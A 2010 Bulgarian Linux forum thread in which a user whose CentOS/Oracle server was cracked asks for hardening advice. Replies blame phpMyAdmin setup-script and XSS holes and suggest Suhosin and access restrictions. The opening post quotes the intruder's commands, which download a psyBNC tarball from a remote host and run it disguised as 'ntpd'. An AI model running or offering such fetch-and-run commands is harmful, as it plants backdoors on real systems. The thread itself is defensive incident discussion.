Автор Тема: Security на CentOS и Oracle  (Прочетена 2968 пъти)

rcbandit

  • Напреднали
  • *****
  • Публикации: 144
    • Профил
Security на CentOS и Oracle
« -: Sep 05, 2010, 11:31 »
Здравейте,
  Имам прясно инсталиран Centos сървър с Oracle който се ползва за разработка и тестване на PHP приложение. Причинатата за новата инсталация е че вчера кракнаха съръвъра и ето тази беля са направили:

wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
wget http://www.freewebs.com/iulianshooter/psybnc-linux-ro.tgz
tar zxvf  psybnc-linux-ro.tgz
rm -rf psybnc-linux-ro.tgz
cd .bash
chmod +x *
./ntpd

  Днеска инсталирах всичко на ново. Бихте ли ми дали съвет кои базови пакети да махна от съвъра и какви настройки да да направя за да стане трудно кракването. Тези които аз бях направил явно не стигат.

поздрави.
Активен

triel

  • Напреднали
  • *****
  • Публикации: 36
    • Профил
Активен

rcbandit

  • Напреднали
  • *****
  • Публикации: 144
    • Профил
Re: Security на CentOS и Oracle
« Отговор #2 -: Sep 05, 2010, 15:38 »
Много благодаря!
   Някой сеща ли си за други източници на подобна инфорация?
Активен

n00b

  • Напреднали
  • *****
  • Публикации: 1248
  • Distribution: OSX
  • Window Manager: 10.6, 10.8, 10.9
  • Live to hack, hack to live.
    • Профил
Re: Security на CentOS и Oracle
« Отговор #3 -: Sep 05, 2010, 20:34 »
И на мен ми бяха хакнали една виртуална машина.

Значи всичко стана през phpmyadmin...
Активен

mobilio - професионални мобилни приложения

b2l

  • Напреднали
  • *****
  • Публикации: 4786
  • Distribution: MCC Interim
  • Window Manager: - // - // -
  • ...sometimes I feel like screaming... || RTFM!
    • Профил
    • WWW
Re: Security на CentOS и Oracle
« Отговор #4 -: Sep 05, 2010, 21:46 »
Значи всичко стана през phpmyadmin...

Абе това защо го ползвате изобщо??? Много ми е странно. Примерно аз го имам на сървъра защото съквартиранта ми да може да си създава бази и разни таблици когато ме няма, понеже като сме двамата и заявките ги пиша по-бързо от колкото да цъка из pma.
Активен

"Човекът е въже, опънато между звяра и свръхчовека, въже над пропаст. Човекът е нещо, което трябва да бъде превъзмогнато." - Фр. Ницше

n00b

  • Напреднали
  • *****
  • Публикации: 1248
  • Distribution: OSX
  • Window Manager: 10.6, 10.8, 10.9
  • Live to hack, hack to live.
    • Профил
Re: Security на CentOS и Oracle
« Отговор #5 -: Sep 05, 2010, 21:59 »
Значи всичко стана през phpmyadmin...

Абе това защо го ползвате изобщо??? Много ми е странно. Примерно аз го имам на сървъра защото съквартиранта ми да може да си създава бази и разни таблици когато ме няма, понеже като сме двамата и заявките ги пиша по-бързо от колкото да цъка из pma.

Ем щот на хората им е по-удобно в него. Инак и аз бича на конзолата.

Та при мен - в phpmyadmin има дупка някъде в setup скрипта. Подаваш му POST заявка в install.php и говедото направо я изпълнява!

Естественно цирка е пълен.

Решението е да се направи парола на phpmyadmin - което ще ги спре ИЛИ да забраниш влизане в phpmyadmin ОСВЕН ако не е дошло от няколко адреса...
Активен

mobilio - професионални мобилни приложения

RealEnder

  • Напреднали
  • *****
  • Публикации: 160
  • Distribution: Ubuntu
  • Window Manager: Unity
    • Профил
    • WWW
Re: Security на CentOS и Oracle
« Отговор #6 -: Sep 06, 2010, 11:51 »
Надали е през phpmyadmin (CentOS+ORACLE)
Логовете запази ли? Паролите силни ли бяха? Какво слушаше към Интернет?
Активен

kifavi8024

  • Новаци
  • *
  • Публикации: 0
    • Профил
Re: Security на CentOS и Oracle
« Отговор #7 -: Sep 13, 2010, 09:29 »
100% е дошло от PHP дупка - няма значение каква/къде...
За целта проблема го решавам с Suhosin Patch/Extension(малък мод на php.ini)... И аз много се дразня от тоя прогнил phpmyadmin - затова без да го "обезопася" като му направя рестриктед достъп - просто се забравя за него (:
Активен

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: Security на CentOS и Oracle
« Отговор #8 -: Sep 13, 2010, 11:23 »
Има доста добри GUI клиенти за работа с тая база. Аз ползвам mysqlcc което е леко криво, но пак е по-добро от уеб-базирания клиент. phpmyadmin има доста секюрити проблеми и ако го ползвате, ползвайте най-новата версия. Има няколко експлойта, разчитащи на това да съществува setup (дали не се казваше config?!?) директорията. В нея има един скрипт, който създава конфигурационен файл - е постоянно се измислят някакви гаменски номера да се вмъква код в този файл и тъй като той е PHP скрипт, който сет-ва глобални променливи - кодът се изпълнява. Другите му проблеми са разни XSS изпълнения, чрез които ти завземат сесията стига да имаш лошия късмет да отвориш каквото не трябва, доста версии имат такива проблеми. Дори имаше нещо като пик на хакнати phpmyadmin-и миналата година, който позатихна като си отстраниха бъговете. Аз лично имах доста автоматизирани опити да ми чупят несъществуващ phpmyadmin.
Активен

"Knowledge is power" - France is Bacon

Подобни теми
Заглавие Започната от Отговора Прегледи Последна публикация
Малко помощ за клиент за Oracle
Настройка на програми
mhydra 19 6466 Последна публикация Mar 06, 2006, 17:40
от NOP
Проблем с подкарването на Oracle
Настройка на програми
bombov 2 2598 Последна публикация Apr 14, 2009, 22:36
от bombov
ORACLE + OCI променливи
Общ форум
victim70 0 1431 Последна публикация Sep 19, 2009, 11:16
от victim70
ORACLE vs GOOGLE
Коментар
plamen_f 19 6931 Последна публикация Mar 30, 2018, 02:37
от n00b
Security на CentOS
Системна Сигурност
xaxaxabew 12 4447 Последна публикация Jan 11, 2011, 19:16
от xaxaxabew